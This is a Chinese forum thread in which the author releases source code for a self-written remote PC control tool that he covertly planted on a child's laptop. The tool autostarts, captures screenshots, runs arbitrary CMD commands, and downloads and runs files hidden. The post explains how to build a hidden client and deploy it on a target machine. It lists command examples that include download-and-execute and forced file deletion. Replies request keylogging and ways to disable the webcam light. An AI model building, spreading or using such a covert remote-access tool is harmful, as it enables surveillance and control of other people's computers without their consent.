吾爱破解 - LCG - LSG |安卓破解|病毒分析|www.52pojie.cn

注册[Register]

QQ登录

只需一步,快速开始

上一主题 下一主题

[原创工具] 开源一个自己写的远程PC监控工具(2019年4月22日更新UI版客户端)

楼主
yaobus 发表于 2019-3-30 19:57 回帖奖励

说明:此版本不再更新
最新版请移步https://www.52pojie.cn/thread-947595-1-1.html
起因
我把我的笔记本电脑给了我12岁的表弟,为了防止他天天玩游戏以及让PC在我的受控之下(他老爸要求的),
然后我写了几个小工具埋在他电脑里面了(埋了多个工具,包括定时发送屏幕截图到指定服务器的,包括HT Parental Controls)。
我的第一个程序是定时发送屏幕截图到我的服务器,开机自启动,可以远程控制截图频率(通过frp远程),但是这个工具不支持实时关闭指定程序
或许这样的程序网上很多,但是总感觉不满意自己的要求!
结果
于是有了下面的工具(代码垃圾,请海涵)。
功能包括:
1.执行CMD命令
2.远程更新(2种方式,1种是内置了update程序,一种是通过功能5实现)
3.开机自启动
4.屏幕查看
5.下载指定文件到指定目录(可通过参数定义是否立即运行)
6.运行指定程序(通过CMD)
7.结束指定程序(通过CMD)
8.删除文件等等(通过CMD)
more。。。。。
2019年4月23日14:02:29
客户端:
1、增加带UI版客户端
2、UI版客户端可以开箱即用
3、UI版可以在应用内修改服务器ip及端口
4、UI版可以显示是否连接到服务器(右下角online/offline)
5、UI版搞了个还算好看的UI
6、UI版单独带一个“clientconfig.ini”配置文件

使用UI版客户端的朋友可以使用带UI版客户端了!不再需要修改无UI版,开箱即用!
需要隐藏运行的,仍然需要使用无UI版的哦,修改内置服务器IP及端口为自己服务器的,然后编译!

(上图是通过frp穿透,通过公网连接服务器的客户端)

(上图是通过局域网连接服务器的客户端)

2019年4月14日更新内容
服务器端:
1、优化通用指令显示排序
2、修复用户界面“通用指令”写成“停用指令”的错误
3、更新指令编辑器优化远程存储目录
4、优化“通用指令”框显示

—————————————以下为旧内容———————————————
2019年4月6日更新内容
服务器端:
1、更新指令库存储方式为sqllite3
2、更新指令注释项
3、增加指令添加窗口
4、添加多条常用指令
5、添加常用指令注释
6、附加 CMD命令说明.pdf
7、增加指令注释说明窗口
8、主窗口增加本机IP显示
客户端:
1、优化IP和端口修改

2019年4月4日更新内容
服务器端:
1、更新服务器端UI
2、增加服务器端保存图片
3、增加定时截图命令“screenshotsevery=”参数单位为秒。
例如screenshotsevery=30(每30秒截图一次)screenshotsevery=0(停止截图)
可以设置图像是否存储及存储路径,必须是已经存在的路径及以“\”结尾

4、增加下载、更新指令辅助编辑工具
5、增加软件设置项
6、增加截图缩放比例
7、增加服务器端口设置
8、移除旧更新指令,精简了客户端体积
9、通过download命令更新
10、移除功能重复的区域
11、修复删除用户指令时指令排版错误的BUG
12、增加了一个图标
13、引入更多未知BUG!
等等
客户端:
1、增加定时截图任务
2、修复下载时心跳停止BUG

服务器端如果不需要修改的话,无需自行编译,已经编译好了。
现在只需要修改客户端连接服务器的IP及端口然后编译成可执行文件就行了!
编译请选择“独立编译”或者“静态编译”!!!
新UI图示(支持自定义缩放):

---------------------------以下为旧内容----------------------------------
客户端源代码说明:
程序通过易语言编写的,需要精易模块支持
如果想要把程序改为自己的
那么最简单的只需要
1、将客户端里面的连接服务器的地址和端口改为自己的

2、将update工具里面的更新url改成自己的

3、将update工具写到客户端的资源表里面

4、编译成可执行文件,将程序复制到目标机器,运行一次即可

服务器源代码说明
1.如图所示

2、服务器主程序目录下有一个cmd.ini文件,里面包含了指令库列表里面的所有内容
3、内置特殊指令说明:
3.1、updataself 更新程序
3.2、rdvermain 版本号查询
3.3、screenshots 捕获屏幕
3.4、download@http://192.168.2.107:32500/file.exe#c:\file.exe|run=2  下载文件
(3.4指令解释: 下载 url 为http://192.168.2.107:32500/file.exe的文件,存到[并命名] c:\file.exe,运行方式为2)
(3.4指令解释:“@”和“#”之间为下载url,“#”和“|”之间是远程存储目录及文件名,"|"之后可以省略[省略则不运行],“|”符号不可以省略,run=2表示,以普通激活方式运行,同理run=1,隐藏运行)
(1、#隐藏窗口; 2、#普通激活; 3、#最小化激活; 4、#最大化激活; 5、#普通不激活; 6、#最小化不激活)
4内置CMD通用指令说明
程序理论上支持所有cmd指令
所以我这里只内置了几个常用的
4.1、taskkill /im "nvidia client.exe" -f  强制关闭程序nvidia client.exe,这里是程序自己,慎用!!!
4.2、ipconfig /all 查看网络,网卡信息
4.3、dir c:\ 查看c盘
4.4、shutdown -s -t 30 30秒后关机
4.5、shutdown -r -t 30 30秒后重启
4.6、tasklist 查看进程列表
4.7、dir %HOMEDRIVE%%HOMEPATH%\DESKTOP 查看桌面
4.8、shutdown -a 取消所有倒计时关机指令
4.9、del /f /s /q 删除文件 (建议查看说明后再执行)
more......
5程序演示

截图演示

6已知问题
程序仅支持单条CMD命令运行,不支持连续运行(通过&分割除外!)

7源代码下载
2019年4月23日14:16:10更新版本及源代码
链接: https://pan.baidu.com/s/1bEeQedStIu2i0blJTKurFw 提取码: ef2h
2019年4月14日20:32:05更新版本及源代码
链接: https://pan.baidu.com/s/1wSVqHO_oSiW9KHCWhOBRYw 提取码: p46h
2019年4月6日更新版本及源代码
链接: https://pan.baidu.com/s/1Fuxy6L3S4wTlMacZ5JtvKg 提取码: gyi3

2019年4月4日更新版本及源代码
链接: https://pan.baidu.com/s/1oywtPsySqf8gjsNU1IurLQ 提取码: 3hus

-----------------------------------以下为旧内容--------------------------------
局域网使用且不需要更新的,直接改客户端的IP就行了,如果端口号改了,在服务器的端口也需要设置成一样的
下载链接更新日期(2019年4月3日)
链接: https://pan.baidu.com/s/18lAjan133qze4mK7wwUMow 提取码: png1
需要搭建web服务器的新手们,可以通过宝塔面板来部署,移步这里“https://www.bt.cn/”
需要公网使用的可以使用frp,移步这里https://diannaobos.com/frp/
编译请选择静态编译或者独立编译!!!

8后记
希望这个工具能帮到有需要的朋友,另外各位大佬能不能给评个热心值,进影视区,你懂得!
请勿用于非法用途!!!

PS:!!!!!
不知道哪个老哥骚操作了?!我可能没有把客户端已有图片资源表里面的update程序的更新URL改掉,
导致有同学没有编译自己的update程序,直接远程更新了,更新了我的客户端!!!现在图片传到我这里来了!
请立即检查一下!!!
下面的同学看到之后有问题请问我!!!

使用注意事项:

要把update.e里面的更新地址换成自己的!!!!!

然后将update.e编译成可执行文件!!!!
将编译好的可执行文件写到客户端的图片资源表里面!!

再编译客户端!!!
将编译好的客户端再放出去!!

免费评分

bluehorse723 + 1 + 1 我很赞同!
smile1110 + 1 谢谢@Thanks!
冷翅膀 + 1 + 1 用心讨论,共获提升!功能可以替代teamview嘛....一般控制下...
jootks + 1 我很赞同!
蛤密瓜 + 1 + 1 谢谢@Thanks!
11200111 + 1 + 1 谢谢@Thanks!
阿龙666 + 1 谢谢@Thanks!
dd1979 + 1 + 1 我很赞同!
ArcTime + 1 + 1 谢谢@Thanks!
hxlafreet + 1 + 1 谢谢@Thanks!
hqm2019 + 1 谢谢@Thanks!
canghx + 1 + 1 我很赞同!
amoser + 1 + 1 我很赞同!
醉饮千觞 + 1 + 1 谢谢@Thanks!
二狗蛋子 + 1 我很赞同!
喵十月 + 1 + 1 我很赞同!
morlock + 1 + 1 很棒的作品
路过的人而已 + 1 谢谢@Thanks!
wlqc + 1 + 1 感谢楼主的无私奉献精神!
catest + 1 + 1 用心讨论,共获提升!
达先 + 1 用心讨论,共获提升!
隆行天下 + 1 + 1 谢谢@Thanks!
酱油吃瓜群众 + 1 + 1 我很赞同!
halfasun + 1 + 1 谢谢@Thanks!
wytjws + 1 + 1 我很赞同!
红枫三叶 + 1 + 1 鼓励转贴优秀软件安全工具和文档!
五月夕风 + 1 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
chao8709 + 1 + 1 热心回复!
fisherpau + 1 + 1 用心讨论,共获提升!
52P-hhx + 1 + 1 谢谢@Thanks!
kvidu + 1 + 1 谢谢@Thanks!
huyang892 + 1 + 1 我很赞同!
yanjg0123 + 1 谢谢@Thanks!
上弦月下弦月圆 + 1 + 1 我很赞同!
白帝萝莉控 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
wangkai558 + 1 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
神月夜 + 1 谢谢@Thanks!
yang1437 + 1 + 1 给大佬递烟,膜拜
laaland + 1 + 1 热心回复!
onlychina + 1 鼓励转贴优秀软件安全工具和文档!
ly7788110 + 1 + 1 热心回复!
sayhi1984 + 1 + 1 鼓励转贴优秀软件安全工具和文档!
kindbigbear0 + 1 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
brostart + 1 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
11lxm + 1 + 1 谢谢@Thanks!
von + 1 点赞
Persie + 1 谢谢@Thanks!
de_mail + 1 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
戴墨镜的熊猫 + 1 + 1 谢谢@Thanks!
hkcyj + 1 + 1 就佩服楼主这种高手
skywalkesd + 1 + 1 牛x,用易语言写成这样
niflheimr + 1 用心讨论,共获提升!
huanglinsd + 1 以为是Linux,没有想到是windows,你可以看看snmp协议,软件还可以,实用性.
lillows + 1 + 1 热心回复!
hzt1314 + 1 谢谢@Thanks!
caterpillar2000 + 1 + 1 我很赞同!
canyang7788 + 1 + 1 用心讨论,共获提升!
敷衍Existence° + 1 + 1 谢谢@Thanks!
sheikh + 1 + 1 鼓励转贴优秀软件安全工具和文档!
bottle + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
w58420019 + 1 + 1 我很赞同!
530253457 + 1 谢谢@Thanks!
麻木不忍 + 1 + 1 鼓励转贴优秀软件安全工具和文档!
生活大爆炸 + 1 鼓励转贴优秀软件安全工具和文档!
52bulesky + 1 + 1 谢谢@Thanks!
JOXOD逗号 + 1 + 1 谢谢@Thanks!
52lxw + 1 鼓励转贴优秀软件安全工具和文档!
learlear + 1 + 1 热心回复!
littleqqp + 1 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
reveanime + 1 + 1 热心回复!
lucas-chou + 1 热心回复!
xhao43 + 1 + 1 谢谢@Thanks!
ClearLover + 1 + 1 影视区?什么影视区
海天一色001 + 1 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
萌小蕾 + 1 用心讨论,共获提升!
爱无悔 + 1 + 1 谢谢@Thanks!
蓝色雨纷飞 + 1 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
a13513510 + 1 + 1 求更新键盘记录功能
luoye14424 + 1 鼓励转贴优秀软件安全工具和文档!
cndaofeng + 2 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
Tsing_52 + 1 我很赞同!
0龙小龙0 + 1 + 1 用心讨论,共获提升!
cao960315 + 1 + 1 我很赞同!
caoyuanyue + 1 + 1 为你点赞!我用了10年易语言,现在转net了!
ebola + 1 + 1 谢谢@Thanks!
密密麻麻Q + 1 + 1 谢谢@Thanks!
做风一样的男子 + 1 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
edaichong + 1 + 1 我很赞同!
zzrx + 1 鼓励转贴优秀软件安全工具和文档!
wuxiaolei1 + 1 用心讨论,共获提升!
zbcxa + 1 + 1 非常强大
Whitte + 1 + 1 热心回复!
axinrain + 1 + 1 谢谢@Thanks!
lixiaojin01 + 1 + 1 谢谢@Thanks!
天地英雄 + 1 + 1 我很赞同!
qn542231788 + 1 谢谢@Thanks!
爱拍阴天 + 1 + 1 好软件,希望出代码图形化(加个按钮和翻译)
feiyunnh + 1 鼓励转贴优秀软件安全工具和文档!
云在天 + 6 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
aiaten + 1 热心回复!

本帖被以下淘专辑推荐:

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

推荐
 楼主| yaobus 发表于 2019-6-27 00:09 |楼主
halfasun 发表于 2019-6-26 23:18
大神,再追问一下:无UI版的可以支持监控多个远程端吗?UI版不能很好的隐藏,而且每次自启动都有弹窗。

支持多个远程端的,我回头检查一下有UI版本的BUG
推荐
 楼主| yaobus 发表于 2019-5-2 23:53 |楼主
yimingriyue 发表于 2019-4-28 18:55
个人见楼主实现的功能,有个过去式的想法,就是可以做成批量终端管理,批量cmd执行,直接采用命令方式,可 ...

船新版本正在开发中,全新的用户界面,全新的解决方案,功能上已经支持多终端管理,远程控制台和简单的远程桌面,打算支持远程文件管理
沙发
lieve 发表于 2019-3-30 20:08
这个好啊  新手弱弱的问一下 有没有现成的软件
绝地守护 发表于 2019-3-30 20:11
感谢分享
lishicheng 发表于 2019-3-30 20:12
真的很优秀了,支持支持
canghaisui 发表于 2019-3-30 20:13
谢谢楼主分享
huangchaodj 发表于 2019-3-30 20:13
感谢分享
zj243781 发表于 2019-3-30 20:16
厉害了。
leidada1314 发表于 2019-3-30 20:16
笔记本的摄像头灯怎么关掉
shuangming 发表于 2019-3-30 20:17
🐮🍺 感谢分享
13994713929 发表于 2019-3-30 20:21
真好,感谢分享